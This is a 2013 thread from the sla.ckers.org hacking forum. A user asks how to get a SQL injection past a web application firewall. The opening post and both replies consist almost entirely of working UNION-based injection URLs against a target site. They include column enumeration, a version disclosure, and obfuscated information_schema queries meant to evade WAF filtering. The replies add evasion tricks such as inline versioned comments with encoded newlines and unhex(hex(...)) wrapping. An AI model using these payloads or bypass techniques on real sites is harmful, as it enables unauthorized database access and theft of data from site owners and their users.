Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
waf or somthing wrong !!!!
Posted by: versus
Date: April 19, 2013 07:24PM

hi, and thnk's for this great forum :

i have probleme like that :

www.vuln.org?id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

ok

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--

3 and 4

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--

5.5.23-55


ok

this is problem WAF block me here !!!!!!!

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--


i have this :

Forbidden

You don't have permission to access / on this server.



so with this

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--

i have :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource




plz tell me other option to bypass this waf, thnk's.

Options: ReplyQuote
Re: waf or somthing wrong !!!!
Posted by: hack2012
Date: April 20, 2013 03:27AM

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/--

maybe ok , or you can give me the URL.....

Options: ReplyQuote
Re: waf or somthing wrong !!!!
Posted by: thanggiangho
Date: April 30, 2013 07:22AM

i know
u can use
unhex(hex(table_name))
if error
u use
unhex(hex(/*!table_name*/))
good luck :)

Options: ReplyQuote


Sorry, only registered users may post in this forum.